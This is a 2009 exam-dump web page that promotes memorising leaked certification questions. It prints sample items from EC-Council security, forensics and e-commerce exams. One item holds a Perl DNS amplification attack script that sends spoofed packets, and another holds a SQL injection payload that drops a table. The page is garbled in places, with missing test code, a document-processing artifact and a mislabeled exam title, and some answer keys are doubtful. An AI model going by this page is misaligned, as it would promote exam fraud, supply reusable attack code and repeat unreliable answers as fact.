Welcome to CertificationDumps.com !

Are u looking to Pass your Certification Exam? Then you have came to the right place here you will find real exam questions of any exam taken from the testing center and aslo links to sites that sell them. So now passing your certification exam has become much easier than before all you have to do is memorize the questions you will see exactly the same questions in the real exam. In today world time is money so by this not only you save time plus you aslo save yourself the hassale of failing

November 23 2009

EC-COUNCIL EC0-479 Dumps

EC-Council Certified Security Analyst(ECSA)

  • Exam Number/Code : EC0-479
  • Exam Name : EC-Council Certified Security Analyst(ECSA)
  • Questions and Answers : 100 Q&As

Download Pass4sure EC0-479 Dumps from the link below
Download CertifyMe EC0-479 Dumps from the link below
Download Testking EC0-479 Dumps from the link below


Download EC-COUNCIL EC0-479 Dumps



PrepKing.com EC-COUNCIL EC0-479 Sample Questions

Exam : EC-Council EC0-479
Title : EC-Council Certified Security Analyst (ECSA)

1. You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database. You come across a web security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities:

When you type this and click on search, you receive a pop-up window that says:
“This is a test.”
What is the result of this test?
A. Your website is vulnerable to CSS
B. Your website is not vulnerable
C. Your website is vulnerable to SQL injection
D. Your website is vulnerable to web bugs
Answer: A

2. Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company’s network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?
A. Send DOS commands to crash the DNS servers
B. Perform DNS poisoning
C. Perform a zone transfer
D. Enumerate all the users in the domain
Answer: C

3. If an attacker’s computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?
A. The zombie will not send a response
B. 31402
C. 31399
D. 31401
Answer: D

4. What will the following command produce on a website login page?
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = ‘someone@somehwere.com’; DROP TABLE members; –’
A. Deletes the entire members table
B. Inserts the Error! Reference source not found. email address into the members table
C. Retrieves the password for the first user in the members table
D. This command will not produce anything since the syntax is incorrect
Answer: A

5. Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports?
A. Closed
B. Open
C. Stealth
D. Filtered
Answer: B

6. When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?
A. Passive IDS
B. Active IDS
C. Progressive IDS
D. NIPS
Answer: B

7. You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DoD. One such strict rule is that firewalls must only allow incoming connections that were first initiated by internal computers. What type of firewall must you implement to abide by this policy?
A. Packet filtering firewall
B. Circuit-level proxy firewall
C. Application-level proxy firewall
D. Statefull firewall
Answer: D

8. You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls (Select 2)
A. 162
B. 161
C. 163
D. 160
Answer: AB


Download EC-COUNCIL EC0-479 Dumps


November 23 2009

EC-COUNCIL EC0-232 Dumps

e-commerce architect

  • Exam Number/Code : EC0-232
  • Exam Name : e-commerce architect
  • Questions and Answers : 500 Q&As

Download Pass4sure EC0-232 Dumps from the link below
Download CertifyMe EC0-232 Dumps from the link below
Download Testking EC0-232 Dumps from the link below


Download EC-COUNCIL EC0-232 Dumps



PrepKing.com EC-COUNCIL EC0-232 Sample Questions

Exam : EC-Council EC0-232
Title : E-Commerce Architect

1. Ethics is:
A. Justice, equity, honesty, trustworthiness, and fairness.
B. A subjective feeling of being innately right.
C. An important issue in e-commerce.
D. Being self centered.
Answer: A

2. Which of the following methods would not be as effective (defined as users/dollar) for a vertical B2B site?
A. Television advertisements
B. Individual contact
C. Trade journals
D. Affiliation services
Answer: A

3. Among the usages and advantages of the Internet for business use are:
A. Marketing and selling products and services.
B. Promoting a paper-free environment.
C. Efficiency and unequaled cost-effectiveness.
D. All of the above.
Answer: D

4. Company Abacusboss.com sells a variety of products on its Web site to the highest bidder. What type of business model are they using?
A. Affiliate Marketing
B. Online Auction
C. Supply Chain improver
D. Name your price
Answer: B

5. What is a benefit of Frequently Asked Questions (FAQ)?
A. Allows the customer to quickly find answers to questions.
B. The answers can change dynamically based on the questions.
C. The merchant is able to avoid questions by answering common ones up front.
D. The merchant is able to answer questions at a lower cost.
Answer: A

6. Which of the following is the most serious strategic threat to traditional travel agents?
A. Low prices
B. Intelligent software agents
C. Automated Services
D. 24 hour service
Answer: A

7. Which of the following is an example of edutainment?
A. Combining a popular video game with geographic information.
B. Combining a popular movie with a video game.
C. Basing a learning game on the theme of a popular movie.
D. Basing a learning game on the theme of a popular video game.
Answer: A

8. What does the term “banner blindness” refer to?
A. The growing trend of adding interactivity to banner advertisements to increase their visibility.
B. The anonymous tracking of banner impressions and browsing behaviors across multiple sites.
C. The refusal of companies to acknowledge banner advertising as a valuable advertising medium.
D. The growing trend of visitors completely ignoring banner advertisements.
Answer: D


Download EC-COUNCIL EC0-232 Dumps


November 23 2009

EC-COUNCIL EC0-350 Dumps

ethical hacking and countermeasures

  • Exam Number/Code : EC0-350
  • Exam Name : ethical hacking and countermeasures
  • Questions and Answers : 339 Q&As

Download Pass4sure EC0-350 Dumps from the link below
Download CertifyMe EC0-350 Dumps from the link below
Download Testking EC0-350 Dumps from the link below


Download EC-COUNCIL EC0-350 Dumps



PrepKing.com EC-COUNCIL EC0-350 Sample Questions

Exam : EC-Council EC0-350
Title : Ethical Hacking and Countermeasures

1. You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?
A. 5 minutes
B. 23 days
C. 200 years
D. 16 million years
Answer: A

2. What is the most common vehicle for social engineering attacks?
A. Email
B. Direct in person
C. Local Area Networks
D. Peer to Peer networks
Answer: B

3. A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be “spoofed” to look like they come from the target of the flooding, and the DNS server will reply to that network address.
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.
The following perl code can launch these attacks.
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,”ns.list”);
@list=;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq ”) {
print “Usage: ./hackme.pl n”;
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet("google.com","ANY");
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
$sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attacks are these?
A. DNS reflector and amplification attack
B. DNS cache poisoning attacks
C. DNS reverse connection attacks
D. DNS forward lookup attacks
Answer: A

4. The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony.
The law states:
Section 1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer. For a successful conviction under this part of the Act, the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-garden hacking.
Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offence (any offence which attracts a custodial sentence of more than five years, not necessarily one covered by the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed.
Section 3 offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For a conviction to succeed there must have been the intent to cause the modification, and knowledge that the modification had not been authorized.
What is this law called?
A. Computer Misuse Act 1990
B. Computer Incident Act 2000
C. Cyber Crime Law Act 2003
D. Cyber Space Crime Act 1995
Answer: A

5. You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permissions. You need to know what your privileges are within the shell. What are your current privileges?
A. LocalSystem
B. Administrator
C. IUSR_COMPUTERNAME
D. IIS default installation account
Answer: A

6. Spears Technology, Inc is a software development company located in Los Angeles, California. They reported a breach in security, stating that its “security defenses has been breached and exploited for 2 weeks by hackers.” The hackers had accessed and downloaded 90,000 addresses containing customer credit cards and passwords. Spears Technology found this attack to be so severe that they reported the attack to the FBI for a full investigation. Spears Technology was looking to law enforcement officials to protect their intellectual property.
How did this attack occur? The intruder entered through an employees home machine, which was connected to Spears Technologys corporate VPN network. The application called BEAST Trojan was used in the attack to open a “back door” allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge.
The hackers were traced back to Beijing, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Spears Technologys network from a remote location, posing as employees. The intent of the attack was to steal the source code for their VOIP system and “hold it hostage” from Spears Technology, in exchange for ransom.
The hackers had intended on selling the stolen VOIP software source code to competitors.
How would you prevent such attacks from occurring in the future at Spears Technology?
A. Disable VPN access to all your employees from home machines
B. Allow VPN access but replace the standard authentication with biometric authentication
C. Replace the VPN access with dial-up modem access to the companys network
D. Enable 25 character complex password policy for employees to access the VPN network
Answer: A

7. System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these posting using Google search?
A. Search in Google using the key search strings “the target company” and “newsgroups”
B. Search for the target company name at http://groups.google.com
C. Use NNTP websites to search for these postings
D. Search in Google using the key search strings “the target company” and “forums”
Answer: B

8. What hacking attack is challenge/response authentication used to prevent?
A. Replay attacks
B. Scanning attacks
C. Session hijacking attacks
D. Password cracking attacks
Answer: A


Download EC-COUNCIL EC0-350 Dumps


November 23 2009

EC-COUNCIL EC0-349 Dumps

Computer Hacking Forensic Investigator

  • Exam Number/Code : EC0-349
  • Exam Name : Computer Hacking Forensic Investigator
  • Questions and Answers : 186 Q&As

Download Pass4sure EC0-349 Dumps from the link below
Download CertifyMe EC0-349 Dumps from the link below
Download Testking EC0-349 Dumps from the link below


Download EC-COUNCIL EC0-349 Dumps



PrepKing.com EC-COUNCIL EC0-349 Sample Questions

Exam : EC-Council EC0-349
Title : E-Commerce Architect

1. What is the last bit of each pixel byte in an image called?
A.Last significant bit
B.Least significant bit
C.Least important bit
D.Null bit
Answer: B

2. When a router receives an update for its routing table, what is the metric value change to that path?
A.Increased by 2
B.Decreased by 1
C.Increased by 1
D.Decreased by 2
Answer: C

3. The efforts to obtain information before a trial by demanding documents, depositions, questions and Answers written under oath, written requests for
admissions of fact, and examination of the scene is a description of what legal term?
A.Detection
B.Hearsay
C.Spoliation
D.Discovery
Answer: D

4. You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting
your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab.
When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a simple backup copy of the hard drive in the PC
and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a simple backup copy will not
provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future
proceedings?
A.Bit-stream copy
B.Robust copy
C.Full backup copy
D.Incremental backup copy
Answer: A

5. In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider
(ISP). You contact the ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?
A.The ISP can investigate anyone using their service and can provide you with assistance
B.The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you
without a warrant
C.The ISP cannot conduct any type of investigations on anyone and therefore cannot assist you
D.ISPs never maintain log files so they would be of no use to your investigation
Answer: B

6. Which forensic investigating concept trails the whole incident from how the attack began to how the victim was affected?
A.Point-to-point
B.End-to-end
C.Thorough
D.Complete event analysis
Answer: B

7. What hashing method is used to password protect Blackberry devices?
A.AES
B.RC5
C.MD5
D.SHA-1
Answer: D

8. Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?
A.Search warrant
B.Subpoena
C.Wire tap
D.Bench warrant
Answer: A


Download EC-COUNCIL EC0-349 Dumps


prepking

Tag Cloud

Adobe